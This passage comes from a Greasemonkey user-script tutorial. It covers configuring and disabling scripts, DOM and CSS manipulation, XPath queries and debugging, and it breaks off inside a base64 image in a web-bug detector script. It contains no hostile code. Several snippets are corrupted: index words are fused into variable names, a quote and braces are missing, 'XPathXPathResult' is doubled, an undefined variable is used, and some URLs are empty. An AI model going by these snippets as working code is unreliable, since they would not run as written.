'gLIlKIT0oDi4CRXNfkWENHqmDmNfL%2FLOA%2FhY5vUisAGl%2FhEKr59SKG71zELDPB' + 'cRNg%2FJz43mmMppwXgfKpWS5ivdSO7qRwmlBXVCxWAUzapO5J07ya5%2BuyIfDxzAX8' + '85gozcnUJD3IyU1bk4kTyIRmhcXDiA2sI2NK3sIk87IvEQzsJVsbtVR3FifAM%2BMrEX' + 'gSH87wxIG4MeO4TmzAk0bYPmgifMsc%2F5zmbg66jmG0IZ8kWUCOLoQXuQthgCfkDxgs' + 'ggInEEH78AcJvzltw0%2FlWPHuCZvbBjMyxtRKyA5k0XitrHJVFZ%2Bd7WmOej%2Bmw1' + 'jmf0mq9NRyRej6b0Op%2F2jbfTToqC4FXG2Crfr7LRjx74tgfh1gOw5FI0zAeBVti3Xz' + 'uktmPiJZKpksD7jA32M1Cs6kLR4GGkdN%2BFem0%2Fm44sxtDAFSzQehG4CU3hQvamjM' + 'coiluHga9uhdlb4YIA9KX1XifODqweFOd6UZ65wnzexqkzwE7l6aiGuxmtznnuY%2FHA' + 'EI76nbdImw%2BBtozxi%2BMoh9j1kGNpZ6XL7hnsNscICh1LkKryhHlv%2FAxIm2vOQr' + 'XgG9HaSbEEQm5BJCe8CLS7qYohMI1i2hCqoW2cGTLXzszydUiyAklR%2FVmuOYhIbAJu' + 'QwvwtmYtBgUvD%2BRDYIdvcxykcLwshKOeZEMUEb0PKTnZtoakjV1NyGM3IVXl%2FhLY' + 'WhC8ypgenMRZKrjtLbQK0EU4slmu%2B9u9OnG0PW5Vac3MD14EHiuXIQY1qF0%2BFy0T' + 'eAkXveY4jmJpOX73cgrcCByl9N7nhSjypA0o02aLf%2BMxhKMJbqECP8h2IzBb7JloNA' + 'LvRBJWjPwGsBeR2Immf1nhRmBJF1%2FyQA2S2ttRMT1%2BZc8NdkNTFxX4MXY5f%2Bbg' + 'hXrgA2jLRwzv6WsxZs61G0HLislE4Cwk1jyHkkche%2FxilGkhPROThcBatOb8CCIvX%' + '2B%2BzsAtNZd8nM1kIjKL1jg2oOyl0o2QKxc6ye%2BFk%2BOV3AP3wcC%2FyPq%2FFol' + 'yIUYH%2FEmUyeGAt2jz0JO6dhxeK0S19YzIQ2IBqTvtjmEnzY%2Bp8UGkCA0i6egFNwU' + 'oU70Wh0jEwitTnEIWXLpMClfbAqSjwx%2FCfPCqKShIYQr3vIJL3ixFt%2Fy8RRsJp9b' + '%2B0q6KKKqqooooqfOB%2F6MmP5%2BlO7YkAAAAASUVORK5CYII%3D'; } Running the Hack After installing the user script (Tools → Install This User Script), go to and scroll to the bottom of the page. You will see a web bug made visible, as shown in Figure 1-10. The graphic of the spider does not come from any server; it is embedded in the user script itself. This makes it easy to distribute a graphics-enabled Greasemonkey script without worrying that everyone who installs it will pound your server on every page request. Avoid Common Pitfalls Learn the history of Greasemonkey security and how it affects you now. have stored; they cannot access values stored by other user scripts, other browser extensions, or Firefox itself. - GM_log - Log a message. See Chapter 11. JavaScript code that comes with a regular web page cannot do this. There is an XMLHttpRequest object that has some of the same capabilities, but for security reasons, Firefox intentionally restricts it to communicating with other pages on the same web site. Greasemonkey's GM_xmlhttpRequest function loosens this restriction and allows user scripts to communicate with any web site, the careful planning that went into sandboxing unprivileged JavaScript code, and allowed unprivileged code to gain access to privileged functions. But wait; it gets worse. Security Hole #3: Local File Access Greasemonkey 0.3 had one more fatal flaw. By issuing a GET request on a file:// URL that pointed to a local file, user scripts could access and read the contents of any file on your hard drive. This is disturbing by itself, but it is especially dangerous when coupled with leaking API functions to remote page scripts. The combination of these security holes meant that a remote page script could steal a reference to the GM_xmlhttpRequest function, call it to read any file on your hard drive, and then call it again to post the contents of that file anywhere in the world: <script type="text/javascript"> // _GM_xmlhttpRequestGM_xmlhttpRequest was captured earlier, // via security hole #2 _GM_xmlhttpRequest({ method: "GET", url: "", onload: function(oResponseDetails) { _GM_xmlhttpRequest({ method: "POST", url: "", data: oResponseDetails.responseText }); } }); </script> Redesigning from the Ground Up All of these problems in Greasemonkey 0.3 stem from one fundamental architectural flaw: it trusts its environment too much. By design, user scripts execute in a hostile environment, an arbitrary web page under someone else's control. We want to execute semitrusted, semiprivileged code within that environment, but we don't want to leak that trust or those privileges to potentially hostile code. The solution is to set up a safe environment where we can execute user scripts. The sandbox needs access to certain parts of the hostile environment (like the DOM of the web page), but it should never allow malicious page scripts to interfere with user scripts, or intercept references to privileged functions. The sandbox should be a one-way street, allowing user scripts to manipulate the page but never the other way around. Greasemonkey 0.5 executes user scripts in a sandbox. It never injects a <Script> element into the original page, nor does it define its API functions on the global window object. Remote page scripts never have a chance to intercept user scripts, because user scripts execute without ever modifying the page. But this is only half the battle. User scripts might need to call functions in order to manipulate the web page. This includes DOM methods such as document.getElementsByTagName and document.createElement, as well as global functions such as window.alert and window.getComputedStyle. A malicious web page could redefine these functions to prevent the user script from working properly, or to make it do something else altogether. To solve this second problem, Greasemonkey 0.5 uses a little-known Firefox feature called XPCNativeWrappers. Instead of simply referencing the window object or the document object, Greasemonkey redefines these to be XPCNativeWrappers. An XPCNativeWrapper wraps a reference to the actual object, but doesn't allow the underlying object to redefine methods or intercept properties. This means that when a user script calls document.createElement, it is guaranteed to be the real createElement method, not some random method that was redefined by the remote page. Going Deeper In Greasemonkey 0.5, the sandbox in which user scripts execute defines the window and document objects as deep XPCNativeWrappers. This means that not only is it safe to call their methods and access their properties, but it is also safe to access the methods and properties of the objects they return. For example, you want to write a user script that calls the document.getElementsByTagName function, and then you want to loop through the elements it returns: var arTextareas = document.getElementsByTagName('textarea'); for (var i = arTextareas.length - 1; i >= 0; i--) { var elmTextarea = arTextareas[i]; elmTextarea.value = my_function(elmTextarea.value); } The document object is an XPCNativeWrapper of the real document object, so your user script can call document.getElementsByTagName and know that it's calling the real getElementsByTagName method. But what about the collection of element objects that the method returns? All these elements are also XPCNativeWrappers, which means it is also safe to access their properties and methods (such as the value property). What about the collection itself? The document.getElementsByTagName function normally returns an HTMLCollection object. This object has properties such as length and special getter methods that allow you to treat it like a JavaScript Array. But it's not an Array; it's an object. In the context of a user script, this object is also wrapped by an XPCNativeWrapper, which means that you can access its length property and know that you're getting the real length property and not calling some malicious getter function that was redefined by the remote page. All of this is confusing but extremely important. This example user script looks exactly the same as JavaScript code you would write as part of a regular web page, and it ends up doing exactly the same thing. But you need to understand that, in the context of a user script, everything is wrapped in an XPCNativeWrapper. The document object, the HTMLCollection, and each Element are all XPCNativeWrappers around their respective objects. Greasemonkey 0.5 goes to great lengths to allow you to write what appears to be regular JavaScript code, and have it do what you would expect regular JavaScript code to do. But the illusion is not perfect. XPCNativeWrappers have some limitations that you need to be aware of. There are 10 common pitfalls to writing Greasemonkey scripts, and all of them revolve around limitations of XPCNativeWrappers.. Pitfall #3: Named Forms and Form Elements Firefox lets you access elements on a web page in a variety of ways. For example, if you had a form named gs that contained an input box named q: <form id="gs"> <input name="q" type="text" value="foo"> </form> you could ordinarily get the value of the input box like this: var q = document.gs.q.value; In a user script, this doesn't work. The document object is an XPCNativeWrapper, and it does not support the shorthand of getting an element by ID. This means document.gs is undefined, so the rest of the statement fails. But even if the document wrapper did support getting an element by ID, the statement would still fail because XPCNativeWrappers around form elements don't support the shorthand of getting form fields by name. This means that even if document.gs returned the form element, document.gs.q would not return the input element, so the statement would still fail. To work around this, you need to use the namedItem method of the document.forms array to access forms by name, and the elements array of the form element to access the form's fields: var form = document.forms.namedItem("gs"); var input = form.elements.namedItem("q"); var q = input.value; You could squeeze this into one line instead of using temporary variables for the form and the input elements, but you still need to call each of these methods and string the return values together. There are no shortcuts. Pitfall #4: Custom Properties JavaScript allows you to define custom properties on any object, just by assigning them. This capability extends to elements on a web page, where you can make up arbitrary attributes and assign them directly to the element's DOM object. var elmFoo = document.getElementById('foo'); elmFoo.myProperty = 'bar'; This doesn't work in Greasemonkey scripts, because elmFoo is really an XPCNativeWrapper around the element named foo, and XPCNativeWrappers don't let you define custom attributes with this syntax. You can set common attributes like id or href, but if you want to define your own custom attributes, you need to use the setAttribute method: var elmFoo = document.getElementById('foo'); elmFoo.setAttribute('myProperty', 'bar'); If you want to access this property later, you will need to use the getAttribute method: var foo = elmFoo.getAttribute('myProperty'); Pitfall #5: Iterating Collections Normally, DOM methods such as document.getElementsByTagName return an HTMLCollection object. This object acts much like a JavaScript Array object. It has a length property that returns the number of elements in the collection, and it allows you to iterate through the elements in the collection with the in keyword: var arInputs = document.getElementsByTagName("input"); for (var elmInput in arInputs) { … } This doesn't work in Greasemonkey scripts because the arInputs object is an XPCNativeWrapper around an HTMLCollection object, and XPCNativeWrappers do not support the in keyword. Instead, you need to iterate through the collection with a for loop, and get a reference to each element separately: for (var i = 0; i < arInputs.length; i++) var elmInput = arInputs[i]; … } Pitfall #6: scrollIntoView In the context of a regular web page, you can manipulate the viewport to scroll the page programmatically. For example, this code will find the page element named foo and scroll the browser window to make the element visible on screen: var elmFoo = document.getElementById('foo'); elmFoo.pitfallsXPCNativeWrappersscrollIntoViewscrollIntoView(); This does not work in Greasemonkey scripts, because elmFoo is an XPCNativeWrapper, and XPCNativeWrappers do not call the scrollIntoView method on the underlying wrapped element. Instead, you need to use the special wrappedJSObject property of the XPCNativeWrapper object to get a reference to the real element, and then call its scrollIntoView method: var elmFoo = document.getElementById('foo'); var elmUnderlyingFoo = elmFoo.wrappedJSObject || elmFoo; elmUnderlyingFoo.scrollIntoView(); It is important to note that this is vulnerable to a malicious remote page redefining the scrollIntoView method to do something other than scrolling the viewport. There is no general solution to this problem. Pitfall #7: location There are several ways for regular JavaScript code to work with the current page's URL. The window.location object contains information about the current URL, including href (the full URL), hostname (the domain name), and pathname (the part of the URL after the domain name). You can programmatically move to a new page by setting window.location.href to another URL. But there is also shorthand for this. The window.location object defines its href attribute as a default property, which means that you can move to a new page simply by setting window.location: window.location = ""; In regular JavaScript code, this sets the window.location.href property, which jumps to the new page. But in Greasemonkey scripts, this doesn't work, because the window object is an XPCNativeWrapper, and XPCNativeWrappers don't support setting the default properties of the wrapped object. This means that setting window.location in a Greasemonkey script will not actually jump to a new page. Instead, you need to explicitly set window.location.href: window.location.href = ""; This also applies to the document.location object. Pitfall #8: Calling Remote Page Scripts Occasionally, a user script needs to call a function defined by the remote page. For example, there are several Greasemonkey scripts that integrate with Gmail (), Google's web mail service. Gmail is heavily dependent on JavaScript, and user scripts that wish to extend it frequently need to call functions that the original page has defined: var searchForm = getNode("s"); searchForm.elements.namedItem("q").value = this.getRunnableQuery(); top.js._MH_OnSearch(window, 0); The original page scripts don't expect to get XPCNativeWrappers as parameters. Here, the _MH_OnSearch function defined by the original page expects the real window as its first argument, not an XPCNativeWrapper around the window. To solve this problem, Greasemonkey defines a special variable, unsafeWindow, which is a reference to the actual window object: var searchForm = getNode("s"); searchForm.elements.namedItem("q").value = this.getRunnableQuery(); top.js._MH_OnSearch(unsafeWindow, 0);. Greasemonkey also defines unsafeDocument, which is the actual document object. As with unsafeWindow, you should never use it except to pass it as a parameter to page scripts that expect the actual document object. Pitfall #9: watch Earlier in this hack, I mentioned the watch method, which is available on every JavaScript object. It allows you to intercept assignments to an object's properties. For instance, you could set up a watch on the window.location object to watch for scripts that tried to navigate to a new page programmatically: window.watch("location", watchLocation); window.location.watch("href", watchLocation); In the context of a user script, this will not work. You need to set the watch on the unsafeWindow object: unsafeWindow.watch("location", watchLocation); unsafeWindow.location.watch("href", watchLocation); Note that this is still vulnerable to a malicious page redefining the watch method itself. There is no general solution to this problem. Pitfall #10: style In JavaScript, every element has a style attribute with which you can get and set the element's CSS styles. Firefox also supports a shorthand method for setting multiple styles at once: var elmFoo = document.getElementById("foo"); elmFoo.setAttribute("style", "margin:0; padding:0;"); This does not work in Greasemonkey scripts, because the object returned by document.getElementById is an XPCNativeWrapper, and XPCNativeWrappers do not support this shorthand for setting CSS styles in bulk. You will need to set each style individually: var elmFoo = document.getElementById("foo"); elmFoo.style.margin = 0; elmFoo.style.padding = 0; Conclusion This is a long and complicated hack, and if you're not thoroughly confused by now, you probably haven't been paying attention. The security concerns that prompted the architectural changes in Greasemonkey 0.5 are both subtle and complex, but it's important that you understand them. The trade-off for this increased security is increased complexity, specifically the limitations and quirks of XPCNativeWrappers. There is not much I can do to make this easier to digest, except to assure you that all the scripts in this book work. I have personally updated all of them and tested them extensively in Greasemonkey 0.5. They can serve as blueprints for your own hacks.
http://commons.oreilly.com/wiki/index.php?title=Greasemonkey_Hacks/Getting_Started&diff=12279&oldid=9630
CC-MAIN-2014-42
refinedweb
10,565
55.74
The QWebSecurityOrigin class defines a security boundary for web sites. More... #include <QWebSecurityOrigin> This class is not part of the Qt GUI Framework Edition. This class was introduced in Qt 4.5.(). Constructs a security origin from other. Destroys the security origin. Adds the given scheme to the list of schemes that are considered equivalent to the file: scheme. They are not subject to cross domain restrictions. that were set by the application as local schemes, This function was introduced in Qt 4.6. See also addLocalScheme() and removeLocalScheme(). Returns the port number defining the security origin. Removes the given scheme from the list of local schemes. This function was introduced in Qt 4.6. See also addLocalScheme(). Returns the scheme defining the security origin.(). Assigns the other security origin to this.
http://doc.qt.nokia.com/4.6-snapshot/qwebsecurityorigin.html
crawl-003
refinedweb
132
62.75
, and so on. ReSharper. Select Alt+R O, then choose on the left.from the main menu or press On this options page, you can specify namespaces that should never be removed and/or namespaces that should be always imported. Open thepage of ReSharper options. Options dialog to apply the modifications and let ReSharper choose where to save them, or save the modifications to a specific settings layer using the Save To list. For more information, see Manage and Share ReSharper Settings. Import missing namespaces ReSharper Built-in: Full Cleanup profile or create and run. Optimize namespace imports using Code Cleanup Select Alt+R O.from the main menu or press. optimize namespace imports: Set the caret anywhere in the file to optimize namespace imports to the file. Select one or more items in the Solution Explorer to optimize namespace imports optimize namespace imports in the selected scope. If you want to optimize namespace imports without opening the Code Cleanup dialog to choose a profile, you can bind the created profile to the silent cleanup and run it by pressing Control+Shift+Alt+F. You can also create a custom cleanup profile that would combine optimizing namespace imports with other code style tasks. This feature is supported in the following languages and technologies: The instructions and examples given here address the use of the feature in C#. For details specific to other languages, see corresponding topics in the ReSharper by Language section.
https://www.jetbrains.com/help/resharper/2021.1/Namespace_Imports_Style.html
CC-MAIN-2022-05
refinedweb
242
55.74
I am getting a very mysterious bug when I run my java website in Browser Mode: IE9 Compatibility View - the sessions stop working and I have no idea why. I don't think there is a tag or any code that I can include in my website that can force the client browser not to run in Compatibility View. I am using this tag to force the browser to pick the latest Document Mode though: <meta http- I am using this code for setting the session in my LoginController.java: import javax.servlet.http.*; HttpSession session = request.getSession(true); session.setAttribute("userObj", curr_user); and this code for getting the session object in my .jsp pages: HttpSession sess = request.getSession(false); if(!(sess.getAttribute("userObj") == null)) { User user = (User) sess.getAttribute("userObj"); username = user.getUsername(); role = user.getRole(); } This works perfectlly fine in IE 9, IE 10, IE 11, Chrome, FF, etc. But when it comes to IE 9 Compatibility View this session is empty in the .jsp pages. As irony would have it, most of my users currently run exactly IE 9 Compatibility View for God knows what reason and they are not happy. I am not happy. Basically this little bug renders the whole site totally useless for them. Can anyone offer me some help in figuring this out, please?
https://www.daniweb.com/programming/software-development/threads/475609/sessions-not-working-in-ie9-compatibility-view
CC-MAIN-2021-43
refinedweb
221
66.94
csVfsCacheManager Class Reference This is a general cache that can cache data on VFS. More... #include <csutil/vfscache.h> Inherits scfImplementation1< csVfsCacheManager, iCacheManager >. Detailed Description This is a general cache that can cache data on VFS. Definition at line 36 of file vfscache.h. Constructor & Destructor Documentation Construct the cache manager with the given directory. All cached data will be put somewhere in that directory. Member Function Documentation Cache some data. Returns true if this succeeded. Clear items from the cache. Flush VFS. Get current scope or 0 if none set. Definition at line 80 of file vfscache.h. Get current type or 0 if none set. Definition at line 72 of file vfscache.h. Retrieve some data from the cache. Returns 0 if the data could not be found in the cache. Set current scope. Set current type. The documentation for this class was generated from the following file: - csutil/vfscache.h Generated for Crystal Space 1.4.1 by doxygen 1.7.1
http://www.crystalspace3d.org/docs/online/api-1.4.1/classcsVfsCacheManager.html
CC-MAIN-2015-06
refinedweb
165
55.2
Client-Side Polling With Dynamic Faces By edort on Oct 26, 2007 By Roger Kitain The world of dynamic web applications offers various ways for a client and server to interact. Two approaches are particularly well suited for situations when information on the server changes frequently. These approaches are: - HTTP Streaming - Client Polling In HTTP streaming, the client/server connection is left open for an extended period of time so that data is streamed from the server to the client. This approach is also known as server-side push, reverse Ajax, or comet. As information changes on the server, updates are pushed to the client. With client polling, the browser periodically issues an XMLHttpRequest call to obtain new information from the server. For example, a client can send an XMLHttpRequest to the server every five seconds to get new information. This approach is also known as periodic refresh. The Dynamic Faces framework brings the power of Ajax to traditional JavaServer Faces Technology (often abbreviated as JSF) applications. Ajax function calls are typically made in JavaScript, which can be unfamiliar to Java developers. With Dynamic Faces, you can add Ajax functionality to a JSF application with little or no JavaScript. Dynamic Faces provides a small "out of the box" JavaScript library that you can use with a JSF application. This tip will show you how you can use Dynamic Faces to build a real-time, stock query application that does client-side polling. You'll see that you don't have to do much JavaScript coding. A package that contains the code for the sample application accompanies the tip. The code examples in the tip are taken from the source code of the sample (which is included in the package). The Stock Query Application This tip uses a stock query application to demonstrate client-side polling with Dynamic Faces. First, let's take a look at the user interface (UI) for the application. User Interface The UI is pretty basic. You enter one or more space-delimited stock symbols in the Symbol text field and click the Search button. In response, the application displays a table of data pertinent to the stocks represented by the symbols you entered. You enter proxy information in the Proxy Host and Proxy Port fields if you are behind a firewall. The most interesting feature of the UI is the Streaming field. The choices are On or Off. If Streaming is set to On, the client polls the server, firing Ajax transactions every 10 seconds (or a specified time interval). The Remote/Local field allows you to choose either Local or Remote. If you select Local, the application uses local data. This is the choice to make if a network connection is not available. If you select Remote, the application calls the Yahoo Stock Quoting service to get the stock data. The size of the result table dynamically changes depending on the number of symbols that you enter. Now let's take a look at the artifacts used in the application. Artifacts There are only three artifacts used in the application: - A JavaServer Pages technology (JSP) page - A JavaScript file - A JSF Managed Bean JSP Page Here's a snippet of the JSP page for the application, home.jsp, showing the relevant parts: <f:view> <html> <head> ... ... <jsfExt:scripts/> <script type="text/javascript"> ... ... include_js('javascripts/stock-faces.js'); </script> </head> <body> <h:form ... <h:panelGrid <h:panelGrid <h:outputText <h:inputText <h:commandButton id="search" value="Search" onclick="DynaFaces.fireAjaxTransaction( this, {});return false;" actionListener="#{bean.getStockInfo}" /> ... <h:selectOneMenu ... </h:panelGrid> </h:panelGrid> <h:panelGrid ... </body> </html> </f:view> Here are some things to notice in the code snippet: <jsfExt:scripts/>is the standard tag to include for Dynamic Faces applications. It includes the Dynamic Faces JavaScript library. - The include_js('javascripts/stock-faces.js');line is a utility function that loads the application's JavaScript file, stock-faces.js. - The h:commandButtontag has an onclick JavaScript event handler attached to it. The event handler, DynaFaces.fireAjaxTransaction, sends an Ajax request to the server when the button is clicked. The actionListenerspecified by #{bean.getStockInfo}is then executed on the server. What's significant here is that any view or JSF component manipulation done on the server happens using Ajax. - The "streaming" option is a h:selectOneMenucomponent that has an onchange JavaScript event handler. - A h:panelGridtag with an id of "stockdata" is a placeholder the dynamic table of stock data. The attribute rendered is set to "false", meaning that the table is not initially rendered. However, the application code sets the attribute to true when there is stock data to return. JavaScript File Here is the JavaScript file, stockfaces.js, for the application: var pollId; /** Delay between requests to the server when polling. */ var pollDelay = 10000; /** Start polling the server */ function start() { pollId = setInterval(poll, pollDelay); } /** Stop polling the server */ function stop() { clearInterval(pollId); } function poll() { queueEvent(); DynaFaces.fireAjaxTransaction(null, {}); } function queueEvent() { var actionEvent = new DynaFaces.ActionEvent("search", DynaFaces.PhaseId.INVOKE_APPLICATION); DynaFaces.queueFacesEvent(actionEvent); return false; } function toggleStreaming() { var menu = document.getElementById("streaming"); var idx = menu.selectedIndex; var streaming = menu[idx].value; if (streaming == "Off") { stop(); } else if (streaming == "On") { start(); } } Here's what the JavaScript code in the file does: - The polling delay, that is, the time interval between calls to the server, is set to 10 seconds. - The start()function initiates the server polling. - The stop()function stops server polling. - The poll()function queues up a server-side JSF action event. It then fires an Ajax request to the server using the Dynamic Faces library. - The queueEvent()function queues up a server-side JSF action event using the Dynamic Faces library. The action event is processed during the standard JSF lifecycle processing as the Ajax request flows to the server. - The toggleStreaming()function toggles the value of the "streaming" menu control. JSF Managed Bean Here's a snippet of the JSF managed bean, Bean.java, showing the relevant parts: /** * This bean has methods to retrieve stock information from * the Yahoo quote service. */ public class Bean { private static final String SERVICE_URL = ""; /** * Action method that is used to retrieve stock * information. This method uses two helper methods - one * to get the stock information, and the other to * dynamically build the "data" components for the UI. */ public void getStockInfo(ActionEvent ae) { ... ... stockData = getStockData(symbols); buildUI(stockData); ... } /** * Helper method to get the stock data (remotely). */ private String[] getStockData(String[] symbols) throws IOException, MalformedURLException { String[] data = new String[symbols.length]; for (int i=0; i<symbols.length; i++) { StringBuffer sb = new StringBuffer(SERVICE_URL); ... ... } return data; } /** * Helper method to dynamically add JSF components to * display the data. */ private void buildUI(String[] stockData) { FacesContext context = FacesContext.getCurrentInstance(); UIForm form = (UIForm)context.getViewRoot().findComponent("form"); UIPanel dataPanel = (UIPanel)form.findComponent("stockdata"); ... ... // Create and add components with data values // Symbol ... dataPanel.getChildren().add(outputComponent); // Name ... dataPanel.getChildren().add(outputComponent); // Open Price (if any) ... dataPanel.getChildren().add(outputComponent); ... ... } dataPanel.setRendered(true); } This JSF Managed Bean has an action method, getStockInfo, that does two things: - It uses a helper method, getStockData, to contact the Yahoo Stock Quote service (as defined by SERVICE_URL) to retrieve stock data for all the symbols. - It uses a helper method, buildUI, to build JSF components (from the stock data) and it adds the JSF components to the JSF component view. After all the components have been created and added, the action method sets the rendered attribute to true on the stockdataJSF component. The action method, getStockInfo, is called when the Search button is pressed. It is also called as the result of an Ajax poll request. This is because each client poll queues an action event tied to this event handler. Refer to the queueEvent method in the stock-faces.js JavaScript file. Running the Sample Code A sample package accompanies this tip that demonstrates the techniques covered in the tip. You can deploy the sample package on any web container that supports the Servlet 2.5 API, JavaServer Pages (JSP) Technology 2.1, and JavaServer Faces Technology 1.2. These instructions assume that you are using GlassFish. To install and run the sample: - If you haven't already done so, download and install GlassFish. - Download the sample application for the tip and extract its contents. You should now see the newly extracted directory as <sample_install_dir>/client-poll-dfaces, where <sample_install_dir>is the directory where you installed the sample application. For example, if you extracted the contents to C:\\on a Windows machine, then your newly created directory should be at C:\\client-poll-dfaces. - Start GlassFish by entering the following command: <GF_HOME>/bin/asadmin start-domain domain1 where <GF_HOME>is the directory where you installed GlassFish. - Deploy the sample by copying <sample_install_dir>/client-poll-dfaces/stock-faces.warto <GF_HOME>/domains/domain1/autodeploy - Open your browser to the URL:. You should see the Stock Query Application UI. - Enter one or more stock symbols delimited by a space, for example, JAVA LMT IBM. If you are behind a firewall, specify the pertinent proxy information in the Proxy Host and Proxy Port fields. Click the Search button. You should see a table of stock data displayed for the symbols you entered. - Try different combinations of streaming and Local/Remote settings, and see what happens. You'll notice that if Streaming is set to On, you don't have to press the Search button. The stock symbols that you specified in the Symbol text field are automatically sent using the Ajax mechanism to the server. If you choose Local, the names and prices are simulated, so that the data will likely be different than the result of a Remote selection. Summary This tip demonstrated how you can combine JSF with Ajax to produce dynamic applications. This application illustrated two features of Dynamic Faces: fireAjaxTransaction - Remote JSF event queuing from JavaScript You can find out more about Dynamic Faces in the jsf-extensions project. Also see Ed Burns's blog Introducing Project Dynamic Faces.> About the Author Roger Kitain is the JavaServer Faces technology co-specification lead. He has been extensively involved with server-side web technologies and products since 1997. Roger started working on JSF in 2001 as a member of the reference implementation team. He has experience with Java Servlet technology, JSP, and most recently has been involved with different rendering technologies for JSF. Hi, First of All Thanks a lot for publishing this artical and it is also informative. Posted by Nihar Bhatt on December 19, 2007 at 02:49 AM PST # Hi.... Thanks a lot .... i run your sample successfully ... and it is really helpful to me... Posted by Nihar Bhatt on December 19, 2007 at 02:55 AM PST # Thanks for the positive feedback. Posted by Ed Ort on December 20, 2007 at 12:45 AM PST # HTML Syntax: NOT allowed Posted by guest on June 08, 2008 at 07:04 PM PDT #
https://blogs.oracle.com/enterprisetechtips/entry/client_side_polling_with_dynamic
CC-MAIN-2016-07
refinedweb
1,812
57.98
#include <mw/fepbase.h> FEPs send character codes to the application underneath them using SimulateKeyEventsL(). Occasionally a FEP may wish to also specify the modifiers (e.g. Fn, Ctrl, Shift) to be sent with that character code. In this case, they should use the overload of CCoeFep::SimulateKeyEventsL() which takes an array of MModifiedCharacters. Returns the character code of the key combination. Returns a TUint which indicates which modifiers to override, rather than using the current state of the keyboard's modifiers. Returns a TUint which indicates which of the modifiers specified in the mask (returned by ModifierMask()) must be on and which must be off.
http://devlib.symbian.slions.net/belle/GUID-C6E5F800-0637-419E-8FE5-1EBB40E725AA/GUID-A988DA6E-9D95-39C2-B4AD-9ECAD47A7358.html
CC-MAIN-2019-22
refinedweb
106
56.86
Silky Smooth Piechart Transitions With React and D3.js Silky Smooth Piechart Transitions With React and D3.js In this post, we go over how to develop smoothly animated pie charts using these two JavaScript frameworks. Read on to learn more! Join the DZone community and get the full member experience.Join For Free Learn how Crafter’s Git-based content management system is reinventing modern digital experiences. Download this white paper now. Today, I finally figured out how to build smooth D3 arc transitions! Got some help from Bostock's commented arc tween block and Andy Shora's guide on tweening custom shapes and paths in D3.js. "The single most important requirement to perform interpolation in D3.js is that the structure of A must match the structure of B." ~ Andy Shora That quote made it click. D'oh! So obvious. Why Arc Transitions Are Hard You see, the problem with arc transitions is that their path definition has a funny shape. It looks like this:. Maybe Sarah Drasner can, she's an SVG goddess. PS: she can �� I can - I mean most of this is much easier to read with a .toFixed(0) or .toFixed(1), and I'll admit the As are much more of a pain than say, Q, which are my favorite. If I wrote it by hand it would probably be more legible for you, too. - Sarah Drasner (@sarah_edo) March 8, 2018 When you build a transition, you're trying to smoothly move from A to B. To get from 0 to 1, you go through 0.1, 0.2 and so on. But a path definition is more complex. You're dealing with a bunch of numbers that have to move just right. Change them all together, and funny things may happen like arcs flying around the screen. Or an error. Tweens to the Rescue Luckily, D3 lets us define custom transitions called tweens. To smoothly animate a piechart, we're going to build an arcTween. Because piecharts are made of arcs. The idea is to move from blindly transitioning path definitions to transitioning angles on a pie slice. We're building a tween generator that takes some params and returns a tweening function. Tweening functions are what makes transitions work, by the way. They take an argument, t, and return the value of your prop at that specific "time" of your transition. Our tween generator is going to need: oldData, the definition of our pie slice at the start of our transition. newData, the definition of our pie slice that we want to tween towards. arc, a D3 arc generator. Both oldData and newData come from a D3 pie generator. Their startAngle and endAngle is what we're interested in. Our arcTween function uses these to build a tween method that we then feed into attrTween. // inspired from function. Each interpolator starts from an oldData angle and moves towards a newData angle. One for the start, one for the end. This function then returns our actual interpolation function. It takes the argument t, feeds it into our two interpolators, adjusts values on the copy object, feeds that into the arc generator, and returns a new path definition. You use it like this: // Piechart.js d3 .select(this.refs.elem) .transition() .duration(80) .attrTween("d", arcTween(this.state.d, newProps.d, this.arc)) .on("end", () => this.setState({ d: newProps.d, pathD: this.arc(newProps.d) }) ); Select an element, a <path>, starts a transition, makes it last 80 milliseconds, attrTween the path definition, d, attribute using the tween returned from arcTween. Better? Let's put it to use in a piechart. We're using React and D3 because React makes dataviz code easier to understand. We build our piechart from 2 components: - Piechart - takes data, feeds into a d3.pie()generator, renders a bunch of arcs in a loop. - Arc - takes data for an arc, feeds it into a d3.arc()generator, renders a <path>element, handles transitions. You can see the full code on GitHub. The Piechart component itself is pretty simple. Takes some data, renders some arcs. // Piechart.js class Piechart extends Component { pie = d3 .pie() .value(d => d.amount) .sortValues(d => d.tag) .padAngle(0.005); render() { const { data, groupBy, x, y, color } = this.props; const _data = groupByFunc(data, groupBy); return ( <g transform={`translate(${x}, ${y})`}> {this.pie(_data).map((d, i) => ( <Arc d={d} color={color(d)} /> ))} <text x="0" textAnchor="middle"> {data.length} </text> <text y="18" x="0" textAnchor="middle"> datapoints </text> </g> ); } } We define a pie generator with a value accessor d => d.amount that sorts arcs by d.tag, and adds a padding of 0.005 between arcs. To learn more about how padding works, check out this wonderful pie padding animation by Mike Bostock. The render method groups data by a given groupBy function, in our case by tag, then outputs a grouping element <g> inside it. - Loops through the output of this.pie(_data)and renders an <Arc>for each value. - Creates two <text>nodes for the center of our piechart. How data makes it into <Piechart> is outside the scope of this tutorial. You can assume data comes as an array that changes every couple milliseconds. This triggers a re-render, which propagates into our <Arc> components. You can read that code on GitHub in the App component. Our <Piechart> gets updated data every few milliseconds and re-renders. This change propagates into <Arc> components via props. That means <Arc> has to handle transitions. Pushing transitions into the <Arc> component means we can preserve React's ideal of declarative rendering. Piechart just renders Arcs and gives them info. Arcs handle everything about rendering pie arcs. Even transitions. The general approach comes from my React+D3v4 book: - Move props into state. - Use state to render. - Transition raw attributes with D3. - Update state when transition ends. The outline for our <Arc> component looks like this: // Piechart.js class Arc extends Component { arc = d3 .arc() .innerRadius(80) .outerRadius(150) .cornerRadius(8); constructor(props) { super(props); this.state = { color: props.color, origCol: props.color, d: props.d, pathD: this.arc(props.d) }; } componentWillReceiveProps(newProps) { // transition, state update } // hover/unhover color changes via this.setState render() { const { color, pathD } = this.state; return ( <path d={pathD} style={{ fill: color }} onMouseOver={this.hover} onMouseOut={this.unhover} ); } } Start with an arc generator that takes data and returns path definitions. Ours has an innerRadius of 80, an outerRadius of 150, and rounded corners. In the constructor, we copy important props to this.state. A good choice are props that we later intend to change. Color on hover/unhover, and d and pathD on input data changes. pathD is the part we’re going to transition. It’s the output of calling this.arc on this.state.d. componentWillReceiveProps is where that transition is going to happen. render doesn’t do much. It outputs a <path> element with a ref of elem. It also defines mouse event handlers. Adding a D3 Transition to a React Component Now that <Arc> is rendering from state, we can use D3 transitions to make updates smoother. That happens inside componentWillReceiveProps. Our goal is to take the new props, use D3 to transition appropriate 